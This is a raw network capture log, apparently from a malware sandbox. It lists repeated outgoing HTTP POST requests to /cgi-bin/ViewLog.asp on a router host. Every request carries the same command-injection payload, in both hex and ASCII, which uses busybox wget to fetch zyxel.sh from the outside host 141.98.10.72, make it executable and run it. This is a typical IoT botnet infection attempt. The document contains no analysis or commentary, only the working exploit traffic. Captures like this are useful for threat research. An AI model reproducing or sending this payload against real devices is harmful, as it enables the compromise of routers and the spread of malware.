Feb 14, 2024 09:30:29.043401957 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:32.088351011 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:38.232131958 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:50.263792992 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:16.119127989 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:32:05.269907951 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
681	192.168.2.15	42328	31.136.157.234	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:29.043487072 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:32.088407040 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:38.232146978 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:50.263816118 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:16.119214058 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:32:05.269855022 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
682	192.168.2.15	54364	85.214.112.164	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:29.052558899 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
683	192.168.2.15	60836	62.171.190.247	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:29.053514004 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
684	192.168.2.15	34148	31.136.79.234	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:29.054433107 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:32.088309050 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:38.232139111 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:50.263792038 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:16.119232893 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:32:05.269906998 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
685	192.168.2.15	48536	94.123.186.116	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:29.078135967 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
686	192.168.2.15	57178	94.122.212.6	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:29.078300953 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
687	192.168.2.15	36764	94.120.255.83	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:29.080162048 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
688	192.168.2.15	41012	62.29.103.46	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:29.080785990 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
689	192.168.2.15	59096	94.123.106.249	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:29.327410936 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
690	192.168.2.15	46500	31.200.42.161	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:29.327735901 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
691	192.168.2.15	47844	31.136.187.186	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:29.469439030 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:30.104449987 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:31.352336884 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:33.880249023 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:39.000089884 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:48.983802080 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:09.975320101 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:50.934065104 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
692	192.168.2.15	37582	31.136.108.154	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:29.485956907 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:30.168457031 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
